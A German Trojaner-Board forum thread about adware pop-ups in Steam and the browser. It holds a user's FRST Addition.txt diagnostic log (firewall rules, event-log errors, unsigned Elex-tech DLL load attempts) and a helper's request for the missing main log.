FirewallRules: [{08F9F6F9-A326-4264-A090-668221C5A9DC}] => (Allow) D:\Steam\steamapps\common\Dragomon Hunter\Launcher.exe
FirewallRules: [{0659C305-2C8A-47F4-A863-E94CE18A7BB7}] => (Allow) D:\Steam\steamapps\common\Dragomon Hunter\Launcher.exe
FirewallRules: [{F54C92FB-6492-4D79-90E5-C8CEA4D84FCC}] => (Allow) D:\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [{1B383AA1-74C4-4BA4-B3A0-7CAF05B08BBA}] => (Allow) D:\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [{3965EFB1-BDB6-4D00-A9BA-5335557587E2}] => (Allow) D:\Steam\steamapps\common\Toribash\toribash.exe
FirewallRules: [{32975120-F6F4-4E89-8482-EA607443B4A2}] => (Allow) D:\Steam\steamapps\common\Toribash\toribash.exe
FirewallRules: [{12FC9764-6EB2-4466-960E-648D04458CE7}] => (Allow) D:\Steam\steamapps\common\Istrolid\istrolid.exe
FirewallRules: [{EB31F644-10BA-4953-BB06-0023DC43CDDE}] => (Allow) D:\Steam\steamapps\common\Istrolid\istrolid.exe
FirewallRules: [{2C2E5E71-399F-4277-B115-147276811ADD}] => (Allow) D:\Steam\steamapps\common\Rust\Rust.exe
FirewallRules: [{B391F42F-795D-422F-8619-4170C50B633C}] => (Allow) D:\Steam\steamapps\common\Rust\Rust.exe
FirewallRules: [{DF4F84E5-9337-42C3-A33C-EFED33506D7F}] => (Allow) D:\Steam\steamapps\common\Age2HD\Launcher.exe
FirewallRules: [{467721BE-8811-44F8-9F11-A06164772ECF}] => (Allow) D:\Steam\steamapps\common\Age2HD\Launcher.exe
FirewallRules: [{3EB48A19-62B6-4215-AC5C-DA6C828A67ED}] => (Allow) D:\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{C6FA964C-0EA4-4A7B-AF44-FD524773F6E8}] => (Allow) D:\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{67FF7DB6-0B11-46BE-9C8C-BF25830D8D95}] => (Allow) D:\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{7C92EC37-7B99-4F34-9674-D811F3BD0B68}] => (Allow) D:\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{FA068FC5-E8B3-4139-9D00-B3472F58228B}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{C60DED09-4AB5-4652-A0D9-EA04DDE49BD5}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{81F02FC2-1AC2-4D29-A2F2-DCE48D4E36F1}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{BCA99CD2-F809-4C9B-A383-4A5B822D02D9}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{22764FAB-541E-4556-8815-C6DDF0849DEC}] => (Allow) D:\geiles steam\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{79C40AF7-D004-43DA-A432-22C449E6D2E9}] => (Allow) D:\geiles steam\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{D97E44D3-AD53-40AD-AA4F-85B6F4DED38C}] => (Allow) D:\geiles steam\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{5FA5CB00-E634-413D-A281-61E1DE34D8C5}] => (Allow) D:\geiles steam\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{986E8BF3-E039-4753-A7CE-A0C6888FB70E}] => (Allow) D:\geiles steam\Steam\bin\steamwebhelper.exe
FirewallRules: [{4D1E5CF4-F5A4-4190-B8C8-4E7AD6AFCC37}] => (Allow) D:\geiles steam\Steam\bin\steamwebhelper.exe
FirewallRules: [{D4BC4A68-6C69-484B-8C25-CCF637D75A54}] => (Allow) D:\geiles steam\Steam\Steam.exe
FirewallRules: [{833987F7-A2AA-4C89-8267-B87B05EA25ED}] => (Allow) D:\geiles steam\Steam\Steam.exe
FirewallRules: [{CE1936C7-A0B5-445F-8897-5D408DB3E4D1}] => (Allow) D:\MyGames\Steam\bin\steamwebhelper.exe
FirewallRules: [{EDB12FBF-6876-4AED-A3F5-82FD04F51FBF}] => (Allow) D:\MyGames\Steam\bin\steamwebhelper.exe
FirewallRules: [{21183B58-6F1C-4CEF-9649-FBA0FE9FA6B6}] => (Allow) D:\MyGames\Steam\Steam.exe
FirewallRules: [{B44E866B-4A37-4999-87DE-61BAA9329B24}] => (Allow) D:\MyGames\Steam\Steam.exe
FirewallRules: [{FA75919A-4F92-44D1-A5B6-D736D70A8ED5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A0F4FD93-18E9-4E08-A93F-5059774352DE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D9572947-BF28-4DDA-8209-8AD350B4662C}] => (Allow) C:\Program Files (x86)\vreXjvX\vreXjvX\bin\vreXjvX_server.exe
FirewallRules: [{ABACBA8E-FAEF-4558-B640-FE01015C65DF}] => (Allow) C:\Program Files (x86)\vreXjvX\vreXjvX\chrome.exe
FirewallRules: [{EAE05F0E-1830-4FD4-9BD7-B74ACBF6742D}] => (Allow) C:\Program Files (x86)\MouseRecorder\MouseRecorder.exe
FirewallRules: [{95E36720-4F96-46B6-8E4B-EC6D9BB866AA}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{291F06B5-D24E-4045-8853-E858EE44A519}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brick-Force ROW\InfernumLogin.exe
FirewallRules: [{731163C4-0683-4987-B02A-C7032BA07637}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brick-Force ROW\InfernumLogin.exe
FirewallRules: [{F59016D5-00F9-442F-A73E-E580EC51265A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe
FirewallRules: [{04CDDDB5-040E-4F36-996D-5EDBD72D55F4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe
FirewallRules: [UDP Query User{49AE9412-35BE-4417-8CEE-F6383214AEDB}C:\users\hempe\appdata\local\mycomgames\mycomgames.exe] => (Block) C:\users\hempe\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [TCP Query User{0716899B-E6BF-4DCD-84BD-4D9C7B32A085}C:\users\hempe\appdata\local\mycomgames\mycomgames.exe] => (Block) C:\users\hempe\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [{FD99E425-96B7-4B44-ABF2-5F080FEB7A5A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rust\Rust.exe
FirewallRules: [{6C4EC681-1FA3-4C41-9781-ECB0E799C532}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rust\Rust.exe
FirewallRules: [{470EAF61-3D2F-4D66-A881-2DCC8AB000F1}] => (Allow) LPort=1900
FirewallRules: [{F57A7CD2-6CE6-4638-8D80-532E4A75E30E}] => (Allow) LPort=2869
FirewallRules: [{519D4747-A39C-4481-9C0D-72646FA9D639}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [UDP Query User{EA9472DC-0953-4899-BA29-146AF2FD88D0}C:\users\hempe\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\hempe\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{D5F8B220-AF54-4E04-994C-69FCE841CD5B}C:\users\hempe\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\hempe\appdata\local\akamai\netsession_win.exe
FirewallRules: [{BFBC7D27-9489-4EFE-A7B9-E6DA4A615E03}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{8821C3A9-11CA-4A89-BB4E-7D38EAA880B3}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{7565D0EE-6A81-4531-A082-A100DB3D4546}] => (Allow) C:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{D2D8660A-E5E1-4085-B8D3-84AC61F41894}] => (Allow) C:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{00385704-C202-43C0-BC1B-A98F11D2C7BD}] => (Allow) C:\Games\World_of_Warships\worldofwarships.exe
FirewallRules: [{4D2773A5-A5AB-4FEF-9807-BFB3DB5F1458}] => (Allow) C:\Games\World_of_Warships\worldofwarships.exe
FirewallRules: [{2693BB79-0040-4556-8C04-5C4EB04682A1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0076A571-70AF-492E-8F1D-74DC409F175F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{FFADBDA3-16D8-4C2C-A8FA-6623B363A26A}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{050EB9A5-A96B-400A-B306-88C295EBA904}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{114628B2-F49D-49F3-BE74-DB5698A64407}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2E49E269-7696-4BC4-9D95-3E27FE186912}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{6FC1413C-5477-464E-9813-DE8AE6E0B508}] => (Allow) D:\Steam Games\steamapps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{15C32AC3-5804-4AFA-96C4-6BD76B198B73}] => (Allow) D:\Steam Games\steamapps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{E153F86E-E148-4BEF-BF6E-171B552F54A3}] => (Allow) D:\MyGames\GameforgeLive\gfl_client.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (11/08/2016 12:23:52 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "WmiApRpl" in der DLL "C:\WINDOWS\system32\wbem\wmiaprpl.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (11/08/2016 12:23:52 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Die erweiterbare Leistungsindikator-DLL rdyboost kann nicht geladen werden. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Windows-Fehlercode.

Error: (11/08/2016 12:23:52 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: Das Serverdienst-Leistungsobjekt kann nicht geöffnet werden. Die ersten vier Bytes (DWORD) des Datenabschnitts enthalten den Statuscode.

Error: (11/08/2016 12:23:52 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "MSDTC" in der DLL "C:\WINDOWS\system32\msdtcuiu.DLL" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (11/08/2016 12:23:52 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "Lsa" in der DLL "C:\Windows\System32\Secur32.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (11/08/2016 12:23:52 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "ESENT" in der DLL "C:\WINDOWS\system32\esentprf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (11/08/2016 12:23:52 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (11/08/2016 11:54:29 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm LolClient.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 196c

Startzeit: 01d239ae5e2a002a

Beendigungszeit: 10

Anwendungspfad: C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.229\deploy\LolClient.exe

Berichts-ID: b7db0b74-a5a1-11e6-9c83-a8a7958e1724

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (11/08/2016 11:24:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: McSACore.exe, Version: 4.0.3.279, Zeitstempel: 0x57f2998e
Name des fehlerhaften Moduls: jscript9.dll, Version: 11.0.14393.321, Zeitstempel: 0x57f4c506
Ausnahmecode: 0xc0000602
Fehleroffset: 0x000000000016cb94
ID des fehlerhaften Prozesses: 0xa3c
Startzeit der fehlerhaften Anwendung: 0x01d2383179694766
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\jscript9.dll
Berichtskennung: 8df0f5ad-f26d-47f1-8e0f-e83e898b5ebf
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (11/07/2016 07:40:23 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm LolClient.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2420

Startzeit: 01d23901cf4a23c1

Beendigungszeit: 17

Anwendungspfad: C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.229\deploy\LolClient.exe

Berichts-ID: 996fa817-a519-11e6-9c83-a8a7958e1724

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:


Systemfehler:
=============
Error: (11/08/2016 02:22:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Steam Client Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (11/08/2016 02:22:32 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Steam Client Service erreicht.

Error: (11/08/2016 11:24:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "McAfee SiteAdvisor Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 3000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (11/08/2016 11:23:37 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (11/08/2016 11:23:37 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (11/08/2016 11:23:37 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID 
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (11/07/2016 10:56:07 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (11/07/2016 10:56:07 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (11/07/2016 10:56:07 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID 
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (11/06/2016 02:27:14 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2016-11-08 14:37:57.116
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 14:28:04.094
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 14:17:12.113
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 14:04:10.628
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 13:55:21.232
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 13:05:47.290
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 12:58:03.747
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 12:42:02.962
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 11:25:38.120
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2016-11-08 00:30:41.024
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 40%
Installierter physikalischer RAM: 8140.2 MB
Verfügbarer physikalischer RAM: 4831.08 MB
Summe virtueller Speicher: 12748.2 MB
Verfügbarer virtueller Speicher: 8666.18 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:110.43 GB) (Free:73.78 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive d: (Volume) (Fixed) (Total:901.02 GB) (Free:900.26 GB) NTFS
Drive e: (Open_Office) (CDROM) (Total:0.69 GB) (Free:0.46 GB) UDF

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 111.8 GB) (Disk ID: BFB20679)

Partition: GPT.

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: BFB2060E)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

Geändert von cosinus (09.11.2016 um 00:43 Uhr) Grund: CODE-Tags

Alt 09.11.2016, 00:44   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Werbung bei Steam und Browser - Standard

Werbung bei Steam und Browser



Hauptlog von FRST fehlt, bitte nachreichen. Und Logs werden grundsätzlich komplett und in CODE-Tags gepostet


Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
__________________

__________________

Antwort

Themen zu Werbung bei Steam und Browser
.com, akamai, avira, browser, converter, downloader, elex-tech, exe, firefox, flash player, helper, home, install.exe, installation, internet, internet explorer, pop ups, problem, registry, rundll, scan, security, server, siteadvisor, svchost.exe, usb, werbung, werbung bei steam und browser, windowsapps



Ähnliche Themen: Werbung bei Steam und Browser


  1. Internet über Browser, Skype, Steam, etc. blockiert
    Log-Analyse und Auswertung - 19.10.2016 (6)
  2. Werbung in Steam aber nicht im Browser
    Plagegeister aller Art und deren Bekämpfung - 11.06.2016 (13)
  3. Werbung Steam DNS Unlocker im Shop
    Log-Analyse und Auswertung - 15.04.2016 (11)
  4. POPup Werbung in Steam
    Log-Analyse und Auswertung - 22.01.2016 (2)
  5. Steam unerwünschte Werbung im Shop/Ingame
    Plagegeister aller Art und deren Bekämpfung - 17.01.2016 (17)
  6. Steam - Werbung aufgeploppt Malware?
    Plagegeister aller Art und deren Bekämpfung - 05.01.2016 (6)
  7. Adware in Steam und Browser
    Plagegeister aller Art und deren Bekämpfung - 22.12.2015 (11)
  8. Windows 8.1: Adware im Steam-Browser!
    Plagegeister aller Art und deren Bekämpfung - 18.10.2015 (7)
  9. Browser Problem(+Steam) : unzählige ungewollte Pop ups
    Plagegeister aller Art und deren Bekämpfung - 07.09.2015 (11)
  10. Popup Invasion im Jedem Browser und bei Steam
    Log-Analyse und Auswertung - 08.06.2015 (8)
  11. Tabs mit Werbung im Browser und Steam
    Log-Analyse und Auswertung - 02.04.2015 (4)
  12. Nervige Popupwerbung im Browser, Steam etc.
    Plagegeister aller Art und deren Bekämpfung - 18.03.2015 (6)
  13. Adware/Trojaner Problem im Browser/Steam
    Netzwerk und Hardware - 01.07.2014 (22)
  14. Steam Werbung ploppt auf wenn ich auf etwas drücke!
    Mülltonne - 21.06.2014 (1)
  15. Windows 8: ungewollte Werbung bei Steam
    Log-Analyse und Auswertung - 08.06.2014 (15)
  16. Ungewollte Werbung in Browser und Steam
    Plagegeister aller Art und deren Bekämpfung - 27.05.2014 (9)

Zum Thema Werbung bei Steam und Browser - Hallo, ich habe folgendes Problem, in meinem Browser und in Steam wird durch Pop Ups Werbung angezeigt.Es öffnet sich auch sehr oft eine Seite, bei der ich mir Reimage Repair - Werbung bei Steam und Browser...
Archiv
Du betrachtest: Werbung bei Steam und Browser auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.